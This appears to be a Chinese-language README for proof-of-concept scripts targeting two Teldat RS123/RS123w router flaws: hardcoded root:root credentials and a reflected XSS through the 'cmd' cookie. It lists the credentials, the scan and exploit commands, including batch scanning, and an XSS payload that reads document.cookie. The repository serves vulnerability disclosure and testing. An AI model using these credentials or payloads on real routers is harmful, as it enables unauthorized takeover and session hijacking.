针对 Teldat RS123 / RS123w 路由器中发现的两种漏洞的概念验证。
| CVE ID | 类型 | CWE | CVSS | 严重性 |
|---|---|---|---|---|
| CVE-2022-39996 | 反射型 XSS | CWE-79 | 6.1 | 中危 |
| CVE-2022-39997 | 弱密码 | CWE-521 | 9.8 | 严重 |
受影响产品: Teldat RS123、RS123w 路由器
Teldat RS123/RS123w 路由器出厂时带有硬编码的默认凭据 root:root。管理员经常保持其不变,使未认证的攻击者能够通过 Telnet、SSH、HTTP 或其他服务获得完全管理访问权限。
Account: root
Password: root

pip install requests paramiko
# Basic check (Telnet, SSH, HTTP)
python CVE-2022-39997.py -t 192.168.1.1
# Full check (all services including HTTPS, FTP)
python CVE-2022-39997.py -t 192.168.1.1 --all
# Batch scan
python CVE-2022-39997.py -f targets.txt
/upgrade/index.html 端点会在响应中原样返回 cmd HTTP cookie 的值,且没有经过净化处理。攻击者可以在 cmd cookie 中构造包含 JavaScript 的恶意请求。当已认证的管理员访问该页面时,脚本会在路由器 Web 界面的浏览器上下文中执行,从而可能造成会话劫持或配置篡改。
cmd cookie 中构造 XSS 载荷:

pip install requests
# Basic XSS check
python CVE-2022-39996.py -t 192.168.1.1
# With HTTP Basic Auth credentials
python CVE-2022-39996.py -t 192.168.1.1 -u root -p root
# Test multiple XSS payloads for confirmation
python CVE-2022-39996.py -t 192.168.1.1 --multi
# Generate standalone POC HTML page
python CVE-2022-39996.py -t 192.168.1.1 --gen-poc
# Custom XSS payload
python CVE-2022-39996.py -t 192.168.1.1 --payload "<script>alert(document.cookie)</script>"
| 文件 | 描述 |
|---|---|
CVE-2022-39997.py | 弱密码检测(Telnet / SSH / HTTP / FTP) |
CVE-2022-39996.py | 通过 cmd cookie 进行反射型 XSS 检测 |
Teldat's Router Vulnerability.md | 完整的漏洞披露报告 |
这些 POC 脚本仅用于教育和授权的安全测试。请勿将其用于你不拥有或未获明确许可进行测试的系统。作者对任何滥用或损害概不负责。